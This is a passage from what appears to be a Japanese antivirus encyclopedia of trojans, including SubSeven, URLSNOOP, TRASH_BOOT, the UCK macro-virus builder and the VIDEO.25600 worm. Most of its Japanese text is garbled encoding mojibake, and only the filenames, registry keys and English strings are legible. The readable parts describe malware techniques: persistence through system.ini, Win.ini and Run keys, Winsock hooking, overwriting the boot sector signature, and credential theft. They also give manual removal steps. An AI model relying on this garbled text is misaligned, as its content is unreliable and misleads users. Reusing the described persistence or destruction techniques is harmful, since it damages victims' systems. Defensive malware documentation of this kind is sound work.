¤Þ¤Ç¥á¡¼¥ë¤ò¤ªÁ÷¤ê¤¯¤À¤µ¤¤¡£¡¡·ï̾¤Ë¤Ï¡Ö¥ï¥¯¥Á¥ó¡¦¥¤ ¥ó¥¹¥È¡¼¥ë¡×¤È ÌÀµ­¤·¤Æ¤¯¤À¤µ¤¤¡£¡¡ÆâÍÆ¤ÏɬÍפ¢¤ê¤Þ¤»¤ó¡£ ¤è¤í¤·¤¯¤ª´ê¤¤¤·¤Þ¤¹¡£ ¡¡¡¡¡¡Ê¸ÀÕ¡¦¥Þ¥¤¥¯¥í¥½¥Õ¥È¡¦¥¸¥ã¥Ñ¥ó¡¦¥µ¡¼¥Ó¥¹ ____________________________________________________ ****¼êưºï½ü¼ê½ç¡Ê¶î½ü¤Ï¤Ç¤­¤Ê¤¤¡Ë ­¡Windows¥Ç¥£¥ì¥¯¥È¥êÆâ¤Îsystem.ini¤ò¥¨¥Ç¥£¥¿¤Çɽ¼¨¤¹ ¤ë¡£ ­¢[boot]¥»¥¯¥·¥ç¥ó¤ÎÃÍKerne1.exe¤òºï½ü¤¹¤ë¡£¡¦½¤ÉüÁ° shell = Explorer.exe Kerne1.exe ¡¦½¤Éü¸å¡ÊÀµ¾ï¤ÊÃÍ¡Ë shell = Explorer.exe ­£¥·¥¹¥Æ¥à¤òºÆµ¯Æ°¤¹¤ë¡£ ­¤Windows ¥Ç¥£¥ì¥¯¥È¥ê¤ÎŽ¢Kerne1.exe¡×¤òºï½ü¤¹¤ëŽ¡ ***System.ini¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡ ¡¡¸½ºß¤Î¤È¤³¤í¡¢Kerne1.exe¡¡¢ª¡¡dl2_win98.dl¡¡¤È¥Õ¥¡ ¥¤¥ë̾¤òÊѹ¹¤·¤¿°¡¼ï¤â³Îǧ¤µ¤ì¤Þ¤·¤¿¡£¤³¤Î¾ò·ï¤Ë¤Ï¤Þ ¤ë¾ì¹ç¤Ï¾åµ­¶î½ü¼ê½ç¤Î¥Õ¥¡¥¤¥ë̾¤òÆÉ¤ßÂØ¤¨¤Æ¤¯¤À¤µ ¤¤¡£ ***¥Ñ¥¿¡¼¥ó607¤è¤ê¡¢¥¦¥¤¥ë¥¹Ì¾¤¬TROJ_BKDOOR-12¤«¤é TROJ_SUBSEVEN.S ¤ËÊѹ¹¤µ¤ì¤Þ¤·¤¿¡£

TROJ_SUPPL


̾¡¡¡¡¾Î:TROJ_SUPPL

ÊÌ¡¡¡¡Ì¾:W32/SUPPL, W95.SUPPL.16384.A,ʬ¡¡¡¡Îà:¥È¥í
¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à
¥¦¥¤¥ë¥¹¥µ¥¤¥º:16384bytes

¾Ü¡¡¡¡ºÙ:W97M_SUPPL¥¦¥¤¥ë¥¹¤ò¼Â¹Ô¤·¤¿¤È¤­¤ËºîÀ®¤µ¤ì
¤ë¥Õ¥¡¥¤¥ë¡ÖDLL.LZH(6,712bytes)¡×¡ÖDLL.TMP(16, 384bytes)¡×¡ÖWSOCK32.DLL(16,384bytes)¡×¤ËÂФ·¤Æ¸¡½Ð¤¹ ¤ë̾¾Î¤Ç¤¹¡£ Send¤ÈConnect¤Î2¤Ä¤ÎWinsock API¤ò¥Õ¥Ã¥¯¤·¡¢´¶À÷¤·¤Æ¤¤ ¤ë¥·¥¹¥Æ¥à¤«¤éÅŻҥ᡼¥ë¤òÁ÷¤ë¤È¤­SUPPL.DOC¤òźÉÕ¤¹¤ë ¤è¤¦¤ËƯ¤­¤Þ¤¹¡£

TROJ_SYSTRAYDLL


̾¡¡¡¡¾Î:TROJ_SYSTRAYDLL

ÊÌ¡¡¡¡Ì¾:SYSTRAYDLL, BackDoor Family, Subseven
Family
¸À¡¡¡¡¸ì:Win9x/NT

ʬ¡¡¡¡Îà:¤½¤Î¾¡¡¡Ê¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¡Ë

¾Ü¡¡¡¡ºÙ:¡¡
¡¡¤³¤ì¤Ï¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤È¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ëʬ¤«¤ì¤Æ¤ª¤ê¡¢¥µ¡¼¥Ð¡¼¥×¥í¥°¥é ¥à¤ò¥È¥í¥¤¤ÎÌÚÇϤȤ·¤Æ¥Þ¥·¥ó¤Î¥·¥¹¥Æ¥à¤ËÀøÆþ¤µ¤»¡¢¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò»ÈÍѤ·¤Æ¥ê¥â¡¼¥ÈÁàºî¤ò¹Ô¤¤¤Þ ¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£ ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯Æ°¤µ¤ì¤ë¤È"A.DLL"¤È"LMDRKI_ 32.DLL"¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢¥·¥¹¥Æ¥àµ¯Æ°»þ¤Ë¼«Æ°¼Â ¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£¤½¤Î¸å¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀÜ Â³¤·¤Æ¼Â¹Ô¤µ¤ì¤¿¥Þ¥·¥ó¤ÎIP¥¢¥É¥ì¥¹¤ò¥¯¥é¥¤¥¢¥ó¥È¥×¥í ¥°¥é¥à¤ËÁ÷¿®¤·¤Þ¤¹¡£¤³¤ì¤Ë¤è¤ê¡¢¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é ¥à¤Î»ý¤Á¼ç¤Ï¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯Æ°¤µ¤ì¤¿¥Þ¥·¥ó¤ò¥ê ¥â¡¼¥ÈÁàºî¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£¤³¤ÎIP¥¢¥É¥ì¥¹¤Ï¥á ¡¼¥ë¤äICQ¤Ç¤âÁ÷¿®¤µ¤ì¡¢¥Ï¥Ã¥«¡¼¤Ï¼«Ê¬¤¬¥ê¥â¡¼¥ÈÁàºî¤Ç ¤­¤ë¥Þ¥·¥ó¤òÃΤ뤳¤È¤¬¤Ç¤­¤Þ¤¹¡£ ¡¡¥Ï¥Ã¥«¡¼¤Ï¥ê¥â¡¼¥ÈÁàºîÃæ¤Î¥Þ¥·¥ó¤ÈÅŻҥÁ¥ã¥Ã¥È¤Î¤è ¤¦¤Ê·Á¤Ç¥á¥Ã¥»¡¼¥¸¸ò´¹¤¬¹Ô¤¨¤Þ¤¹¡£Ctrl+Alt+Del¤Ë¤è¤ë ¶¯À©½ªÎ»¤ò̵¸ú¤ËÀßÄꤹ¤ë¤³¤È¤â¤Ç¤­¤Þ¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í ¥°¥é¥à¤Ï¼«Ê¬¤¬µ¯Æ°¤·¤Æ¤«¤é¤½¤Î¥Þ¥·¥ó¾å¤ÇÆþÎϤµ¤ì¤¿¤¹ ¤Ù¤Æ¤Î¥Ñ¥¹¥ï¡¼¥É¤òµ­Ï¿¤·¤Þ¤¹¡£

TROJ_TELEFOON


̾¡¡¡¡¾Î:TROJ_TELEFOON

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:184,241bytes

¾Ü¡¡¡¡ºÙ:¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¡¢C:\RA\RA.

EXE ¤È C:\RA\RA.OVR ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬¥Þ¥·¥ó¤Ë¸ºß¤¹¤ë
¤«¤É¤¦¤«¤ò³Îǧ¤·¤Þ¤¹¡£¥Õ¥¡¥¤¥ë¤¬¤¢¤ì¤Ð¡¢¤½¤ì¤é¤Ë¥¦¥¤ ¥ë¥¹¥³¡¼¥É¤òÄɲä·¤Þ¤¹¡£ ¤½¤Î¸å¡¢INT21¤Ë¥Õ¥Ã¥¯¤·¡¢¥á¥â¥ê¤Ë¾ïÃ󤹤롣¥·¥¹¥Æ¥à¤Î ¥á¥â¥ê¤ò´Æ»ë¤·¡¢TELEFOON¤È¤¤¤¦¥¹¥È¥ê¥ó¥°(ʸ»úÎó)¤òõ ¤·¤Þ¤¹¡£¤³¤Î¥¹¥È¥ê¥ó¥°¤¬¸«¤Ä¤«¤ë¤È¡¢¤½¤Î¥Ö¥í¥Ã¥¯¤Ë¿ô ¥Ð¥¤¥È¤ò³ä¤êÅö¤Æ¡¢¥Ñ¥Ã¥Á¤ò»Ü¤·¤Þ¤¹¡£¤³¤Î¤¿¤á¡¢¤³¤Î¥È ¥í¥¤¤ÎÌÚÇϤϥ·¥¹¥Æ¥à¥á¥â¥ê¤ò¤¿¤¯¤µ¤ó¾ÃÈñ¤·¡¢¥ê¥½¡¼¥¹ ÉÔ­¤Ë´Ù¤ê¤Þ¤¹¡£¤Þ¤¿¡¢¥×¥í¥°¥é¥à¤¬ÉÔÀµ¤ÊÌ¿Îá¤ò»ÈÍѤ· ¤Æ¤¤¤ë¤¿¤á¡¢¥·¥¹¥Æ¥à¥¯¥é¥Ã¥·¥å¤Î¸¶°ø¤Ë¤â¤Ê¤ê¤«¤Í¤Þ¤» ¤ó¡£

TROJ_THCK_FP


̾¡¡¡¡¾Î:TROJ_THCK_FP

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:12350bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥¦¥¤¥ë¥¹¤òºîÀ®¤¹¤ë¤¿¤á¤Î¥Ä¡¼¥ë¤Ç¤¢
¤ë¡£DOS¾å¤Çưºî¤¹¤ë¡£¤³¤Î¥×¥í¥°¥é¥à¤òÍøÍѤ·¤Æ¡¢»ØÄꤷ ¤¿¥Õ¥¡¥¤¥ë¤Ë»ØÄꤷ¤¿¥³¡¼¥É¤òÄɲ乤뤳¤È¤¬¤Ç¤­¤ë¡£ ¤½¤Î¤Û¤«¤ÎÇ˲õ³èưÅù¤Ï¤Ê¤·¡£
È÷¡¡¡¡¹Í:ÉÔÀµ¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¡¢¤³¤Î¥Õ¥¡¥¤¥ë¼«¿È¤ËÂÐ
¤·¤Æ¶î½ü¤ò¹Ô¤¦¤³¤È¤Ï¤Ç¤­¤Ê¤¤¡£È¯¸«¤·¤¿¾ì¹ç¤Ï¥Õ¥¡¥¤¥ë ¤òºï½ü¤¹¤ë¡£

TROJ_TRASH_BOOT


̾¡¡¡¡¾Î:TROJ_TRASH_BOOT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Dos Exec

¥¦¥¤¥ë¥¹¥µ¥¤¥º:48 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥Ñ¡¼¥Æ¥£ ¥·¥ç¥ó¥Ö¡¼¥È¥»¥¯¥¿¤Î¥·¥°¥Ë¥Á¥ã¥ï¡¼¥É¤Ç¤¢¤ë¡È55 AA¡É¤ò ¡È00 00¡É¤Ç¾å½ñ¤­¤¹¤ë¡£¤³¤Î¤¿¤á¡¢¥Ö¡¼¥È¥»¥¯¥¿¤¬µ¡Ç½¤· ¤Ê¤¯¤Ê¤ê¡¢¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¤òºîÀ®¤·Ä¾¤µ¤Ê¤¯¤Æ¤Ï¤Ê¤é¤Ê¤¯ ¤Ê¤Ã¤Æ¤·¤Þ¤¦¡£

TROJ_TROJAN


̾¡¡¡¡¾Î:TROJ_TROJAN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿Ç˲õ¥×¥í¥°¥é¥à¤Ç¤¢¤êޤ´¶
À÷³èư¤Ï¹Ô¤ï¤Ê¤¤Ž¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤Èޤ¤Þ¤º¥·¥¹¥Æ¥à¤ò¥Á¥§¥Ã¥¯ ¤·¤Æ»È¤ï¤ì¤Æ¤¤¤ë¥Ï¡¼¥É¥¦¥§¥¢¤Î¼ïÎà¤ò³Îǧ¤·Ž¤¥·¥¹¥Æ¥à¥Ç ¥Ð¥¤¥¹¾ðÊó¤ò¼èÆÀ¤¹¤ë(stdprnޤstdauxޤ stderrޤ stdoutޤ stdinޤ ¤Ê¤É)Ž¡¤½¤·¤ÆŽ¤¤³¤ì¤é¤Î¾ðÊó¤ò½¤Àµ¤·Ž¤¥·¥¹¥Æ¥à¤¬Àµ ¾ï¤Ëưºî¤·¤Ê¤¤¤è¤¦¤Ë¤¹¤ëŽ¡ -¡¡¤µ¤é¤Ëޤ¥é¥ó¥À¥à¤Ë·èÄꤵ¤ì¤¿Æü»þ¤Ë¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ò ¥Õ¥©¡¼¥Þ¥Ã¥È¤·¤Æ¤·¤Þ¤¦Ž¡
È÷¡¡¡¡¹Í:¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾:TROJAN.EXE (32ޤ
768bytes)

TROJ_UCK


̾¡¡¡¡¾Î:TROJ_UCK

ÊÌ¡¡¡¡Ì¾:ULTRAS CONSTRUCTION KIT

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:393 KBytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:- ¤³¤Î¥×¥í¥°¥é¥à¤ÏWORD7.0(95)ÍÑ¥Þ¥¯¥í¥¦¥¤¥ë
¥¹ºîÀ®¥Ä¡¼¥ë¤Ç¤¢¤ë¡£ºîÀ®¼Ô¤Î¹¥¤ß¤Ë¹ç¤ï¤»¤Æ¥Þ¥¯¥í¥¦¥¤ ¥ë¥¹¤ò¼«Æ°À¸À®¤¹¤ë¡£¤³¤Î¥×¥í¥°¥é¥à¼«ÂΤˤÏÇ˲õ³èư¤Ï ¤Ê¤¤¡£ -¡¡¼Â¹Ô¤¹¤ë¤È¤Þ¤ºŽ¤°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ëŽ¡ "WELCOME TO ULTRAS CONSTRUCTION KIT" - "OK"¤ò²¡¤¹¤Èޤ°Ê²¼¤ÎÁªÂò¤ò¤¹¤ë¥À¥¤¥¢¥í¥°¥Ü¥Ã¥¯¥¹¤¬É½ ¼¨¤µ¤ì¤ëŽ¡ "INFECT" "KILL ANTIVIRUS" "STEALTH" "PAYLOAD" "HELP" "OK" -¡¡Î㤨¤Ð"PAYLORD(»³²)"¤òÁª¤Ö¤Èޤ°Ê²¼¤Î¥á¥Ë¥å¡¼¤òÁªÂò ¤¹¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡ "NEW ICON" "Set Password" "Kill Desktop" "Registers in Word" "Exit Windows" "Random Password" "Document Info" "Kill Windows Files" "Kill Windows95" "Kill Program Files" "Message Box" "Kill Dll" - ¤³¤Î¤è¤¦¤Ë¥À¥¤¥¢¥í¥°¤Ë½¾¤Ã¤ÆÆþÎϤ¹¤ë¤À¤±¤Ç´Êñ¤Ë¥Þ ¥¯¥í¥¦¥¤¥ë¥¹¤òºîÀ®¤¹¤ë»ö¤¬¤Ç¤­¤ëŽ¡
È÷¡¡¡¡¹Í:

TROJ_URLSNOOP


̾¡¡¡¡¾Î:TROJ_URLSNOOP

ÊÌ¡¡¡¡Ì¾:TROJ/PICTURE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:353792 bytes

ȯ¾ÍÃÏ:USA

ȯ¸«Æü:1999/1

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤ÎÌÚ
ÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷³è ư¤Ï¹Ô¤ï¤Ê¤¤¡£
¡¡¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾¡¡:¡¡Soft.exeޤ Picture.exe

¾É¾õ:

¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤ÈޤC:\windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë
Note.exe¤¬ºîÀ®¤µ¤ì¤ë¡£¤µ¤é¤Ë¡¢Win.ini¤Ërun=note.exe¤ò Äɲ乤롣¤³¤ì¤Ë¤è¤êޤ¥·¥¹¥Æ¥àµ¯Æ°»þ¤ËNote.exe¤¬¼Â¹Ô¤µ ¤ì¤ë¤³¤È¤Ë¤Ê¤ëŽ¡
»³²:
¡¡¥æ¡¼¥¶¡¼¤Î¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤«¤é¡¢¥¦¥§¥Ö±ÜÍ÷ÍúÎò¤ä¡¢¥¢ ¥á¥ê¥«¡¦¥ª¥ó¥é¥¤¥ó(AOL)¤Î¥æ¡¼¥¶¡¼Ì¾¡¢¥Ñ¥¹¥ï¡¼¥É¤Ê¤É¤ò Åð¤ß¡¢°Å¹æ²½¤¹¤ë¡£¤µ¤é¤Ë¡¢°Å¹æ²½¤·¤¿¥Ç¡¼¥¿¤ò¤¢¤ëÆÃÄê ¤Ê¥á¡¼¥ë¥¢¥É¥ì¥¹¤ËÁ÷¿®¤¹¤ë¡£
ȯ¸«ÊýË¡:

¡¡C:\windows¥Ç¥£¥ì¥¯¥È¥ê¤Ënote.exe¤¬¤¢¤ë¤«¤òÄ´¤Ù¤ëŽ¡

È÷¡¡¡¡¹Í:¿®Íê¤Ç¤­¤Ê¤¤¿Í¤«¤éÁ÷¤é¤ì¤¿¥á¡¼¥ë¤ËSoft.exe
¤äPicture.exe¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬ÅºÉÕ¤µ¤ì¤Æ¤¤¤¿¤éޤ¤½¤Î¥Õ ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤Ê¤¤¤³¤È¤Ç¤¢¤ë¡£¼Â¹Ô¤·¤¿¾ì¹ç¤Ë¤Ï®¤ä¤« ¤Ënote.exe¤Èwin.iniÆâ¤Îrun=note.exe¤Îµ­½Ò¤òºï½ü¤¹¤ë¤³ ¤È¤¬É¬ÍפǤ¢¤ë¡£

TROJ_VAC


̾¡¡¡¡¾Î:TROJ_VAC

ÊÌ¡¡¡¡Ì¾:VAC

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¾É¾õ:
¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¼¡¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ "Virus vaccinator version 1.0¡¡Would you like to search for 84 different virusesin memory Y/N?" ¡Ê¥¦¥¤¥ë¥¹¥ï¥¯¥Á¥ó¡¡ ¥Ð¡¼¥¸¥ç¥ó1.0¡¡¥á¥â¥ê¡¼¾å¤Î¥¦¥¤ ¥ë¥¹84¼ï¤ò¸¡º÷¤·¤Þ¤¹¤« ¡¡¤Ï¤¤/¤¤¤¤¤¨¡©¡Ë ¤½¤Î¸å¡¢¥É¥é¥¤¥ÖC¤ÈD¤Î¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ë. ZIP¡¢.COM¤è¤Ó.EXE¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë¡£¤Þ¤¿¡¢¥·¥¹¥Æ¥à¤ò ¥Ï¥ó¥°¥¢¥Ã¥×¤µ¤»¤ë¡£
È÷¡¡¡¡¹Í:

TROJ_VACCINE


̾¡¡¡¡¾Î:TROJ_VACCINE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:14ޤ689¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢¼«¸ÊÊ£
À½¤ä¥Õ¥¡¥¤¥ë´¶À÷¤Ï¹Ô¤ï¤Ê¤¤¤¬¡¢¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Î¥· ¥¹¥Æ¥à¤òÇ˲õ¤¹¤ë¡Ê¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ï»½ý¤ò¼õ¤±¤Ê¤¤¡Ë¡£ -¡¡"PC-VACINE"¡ÊPC¥ï¥¯¥Á¥ó¡Ë¤Èɽ¼¨¤µ¤ì¤¿¤¢¤È¡¢"press any key to begin Virus scan"¡Ê¡Ö¥¦¥¤¥ë¥¹¥¹¥­¥ã¥ó¤ò»Ï ¤á¤ë¤Ë ¤Ï¡¢²¿¤«¥­¡¼¤òÆþÎϤ·¤Æ¤¯¤À¤µ¤¤¡×¡Ë¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤¬ ¸½¤ï¤ì¤ë¡£¤³¤Î¤È¤­¥æ¡¼¥¶¡¼¤¬¥­¡¼¤ò²¡¤¹¤È¡¢¥¦¥¤¥ë¥¹¤ÏA ¥É¥é¥¤¥Ö¡Ê¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¡Ë¤ò¸¡ºº¤·¡¢¼¡¤ÎÆó¤Ä¤Î¥á ¥Ã ¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡¡"Diskette scannedޤ no viruses found...So I gave ya one!!!" ¡¡¡Ê¡Ö¸¡ºº¤·¤¿¥Ç¥£¥¹¥¯¤Ë¤Ï¥¦¥¤¥ë¥¹¤¬¸«¤Ä¤«¤ê¤Þ¤»¤ó¤Ç ¤·¤¿¡Ä¡Ä¤À¤«¤é¡¢¤Ò¤È¤Ä¤¢¤²¤ë¤è¡ª¡ª¡ª¡×¡Ë ¡¡"EAT SHIT AND DIE YOU LOSER!! Ž©SECTOR INFECTOR 1992..Muhahahaha!!!" ¡¡¡Ê¡Ö¤ª¤Þ¤¨¤ß¤¿¤¤¤ÊÉ餱¸¤¤Ï¥¯¥½¤Ç¤â¤¯¤é¤Ã¤Æ»à¤ó¤¸¤Þ ¤¨¡ª¡ª ¡¡¡¡¡¡Ž©SECTOR INFECTOR 1992..¥à¥Ï¥Ï¥Ï¥Ï!!!¡×¡Ë ¡¡ »³² ¡¡¥Ç¥£¥¹¥¯¥»¥¯¥¿¡¼¤Ë̵°ÕÌ£¤Êʸ»úÎ󤬽ñ¤­¹þ¤Þ¤ì¤ë¤¿ ¤á¡¢°Ê¸å¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ë¥¢¥¯¥»¥¹¤Ç¤­¤Ê¤¯¤Ê¤ë¡£¤µ ¤é¤Ë¡¢¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¾å¤ÎÁ´¥Ç¡¼¥¿¤¬Ç˲õ¤µ¤ì¡¢½¤Àµ ÉÔ²Äǽ ¤È¤Ê¤ë¡£ ¡¡
È÷¡¡¡¡¹Í:

TROJ_VIDEO.25600


̾¡¡¡¡¾Î:TROJ_VIDEO.25600

ÊÌ¡¡¡¡Ì¾:W32.Video.25600.Worm

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

ÂС¡¡¡¾Ý:9x/NT/2000

¾Ü¡¡¡¡ºÙ:TROJ_VIDEO.25600 ¤Ï TROJ_MYPICS ¤ä TROJ_
ICQGREETING ƱÍÍE-mail¤òÍøÍѤ·¤Æ³È»¶¤¹¤ë¥á¥â¥ê¾ïÃó·¿ ¥ï¡¼¥à¤Î¿·¤·¤¤°¡¼ï¤Ç¤¹¡£Windows 9x ¡¢Windows NT ¡¢ Windows 2000 ¾å¤Çưºî¤·¤Þ¤¹¡£
¾É¾õ:
¡¡¤³¤Î¥ï¡¼¥à¤Ï¼Â¹Ô¤µ¤ì¤ë¤ÈOutlook¤Î¥¢¥É¥ì¥¹Ä¢¤Ë¤¢¤ë¤¹ ¤Ù¤Æ¤Î¼õ¿®¼Ô¤Ë°Ê²¼¤Î¤è¤¦¤ÊÆâÍÆ¤Î¥á¡¼¥ë¤òÁ÷¿®¤·¡¢³È»¶ ¤·¤Þ¤¹¡£ ·ï̾ Here¡Çs a digital video for you. ËÜʸ ¤Ê¤· źÉÕ¥Õ¥¡¥¤¥ë VIDEO.EXE ¥á¡¼¥ë¼õ¿®¼Ô¤¬"VIDEO.exe"¤ò¼Â¹Ô¤·¤Æ¤â¡¢°ì¸«²¿¤âµ¯¤³ ¤é¤º¤Ë½ªÎ»¤·¤¿¤«¤Î¤è¤¦¤Ë¸«¤¨¤Þ¤¹¡£¤·¤«¤·¡¢¤³¤Î´Ö¤Ë ¥ï¡¼¥à¤Ï¥á¥â¥ê¤Ë¾ïÃ󤷰ʲ¼¤Î³èư¤ò¹Ô¤¤¤Þ¤¹¡£
³èư:

¡¡¼Â¹Ô¤µ¤ì¤ë¤È¤Þ¤ºC:¥É¥é¥¤¥Ö¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤Ë¼«
ʬ¤Î¥³¥Ô¡¼¤ò£²¤Äºî¤ê¤Þ¤¹¡£¥Õ¥¡¥¤¥ë̾¤Ï"ZIP01.EXE" "VIDEO.EXE"¤Ç¤¹¡£"ZIP01.EXE"¤Ï¼«Æ°µ¯Æ°¤Î¤¿¤á¤Ë»È ÍѤµ¤ì¤Þ¤¹¡£"VIDEO.EXE"¤Ï¼«Æ°Á÷¿®¤Î¥á¡¼¥ë¤ËźÉÕ¤¹¤ë¤¿ ¤á¤Î¤â¤Î¤Ç¤¹¡£ ¼¡¤ËWindows¤Î¥ì¥¸¥¹¥È¥ê¤Ë°Ê²¼¤Î¥­¡¼¤òÅÐÏ¿¤·¤Þ¤¹¡£
Windows9x¤Î¾ì¹ç:
HKEY_LOCAL_ MACHINES\Software\Microsoft\Windows\Currentversion\ Run
Agent5 = c:\zip01.exe

WindowsNT¤Î¾ì¹ç:
HKEY_LOCAL_MACHINES\Software\Microsoft\WindowsNT \
CurrentVersion\WindowsNT\Run\Agent5 = c:\zip01.exe
¤³¤ì¤Ë¤è¤ê¡¢¥Þ¥·¥óµ¯Æ°»þ¤Ë¥ï¡¼¥à¤¬¼«Æ°Åª¤Ëµ¯Æ°¤µ¤ì¤ë ¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£ ¡¡ ¡¡¤³¤Î¥ï¡¼¥à¤¬¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤È ctrl-alt-del ¤È alt- tab ¤Î¥­¡¼Áàºî¤¬Ìµ¸ú¤Ë¤Ê¤ê¤Þ¤¹¡£¤³¤ì¤Ë¤è¤ê¡¢Windows9x ¤Ç¤Ï¥¿¥¹¥¯¥Þ¥Í¡¼¥¸¥ã¡¼¤Îɽ¼¨¤¬¤Ç¤­¤Ê¤¯¤Ê¤ê¤Þ¤¹¡£¤Þ
¤¿¡¢C:\windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ëÀßÄê¥Õ¥¡¥¤¥ë¡Ê³ÈÄ¥»Ò
